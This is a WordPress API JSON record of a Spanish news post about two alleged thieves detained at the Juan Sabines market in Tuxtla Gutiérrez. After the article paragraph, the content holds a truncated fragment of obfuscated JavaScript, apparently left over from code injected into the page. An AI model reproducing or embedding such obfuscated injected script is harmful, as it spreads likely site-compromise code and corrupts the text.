{"id":14730,"date":"2024-03-19T00:17:44","date_gmt":"2024-03-19T00:17:44","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=14730"},"modified":"2024-03-19T00:17:45","modified_gmt":"2024-03-19T00:17:45","slug":"deteinen-a-dos-presuntos-ladrones-en-el-mercado-del-centro","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=14730","title":{"rendered":"Deteinen a dos presuntos ladrones en el mercado del centro"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/FB_IMG_1710807293118-768x1024.jpg\" alt=\"\" class=\"wp-image-14731\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/FB_IMG_1710807293118-768x1024.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/FB_IMG_1710807293118-225x300.jpg 225w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/FB_IMG_1710807293118.jpg 1080w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudano, 18 de marzo del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este lunes fueron asegurados dos sujetos se\u00f1alados de robar en el Mercado Juan Sabines de Tuxtla Guti\u00e9rrez.Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando el mismo personal de seguridad del mercado socorri\u00f3 a una menor de edad cuando solicit\u00f3 ayuda luego de que le robaron su celular.De inmediato se coordinaron en apoyo con los locatarios y lograron detener a un sujeto quien se\u00f1al\u00f3 a su c\u00f3mplice.Inmediatamente despu\u00e9s de aseguarlos fueron llevados a la direcci\u00f3n del mercado y entregados a la polic\u00eda municipal.Los delincuentes ser\u00edan trasladados a la popular por una falta administrativa, ya que la menor no quiso proceder con la demanda legal.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudano, 18 de marzo del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este lunes fueron asegurados dos sujetos se\u00f1alados de robar en el Mercado Juan Sabines de Tuxtla Guti\u00e9rrez.Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando el mismo personal de seguridad del mercado socorri\u00f3 a una menor de edad cuando solicit\u00f3 ayuda luego de que &hellip;<\/p>\n","protected":false},"author":2,"featured_media":14731,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-14730","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14730","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14730"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14730\/revisions"}],"predecessor-version":[{"id":14732,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14730\/revisions\/14732"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/14731"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14730"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14730"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14730"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}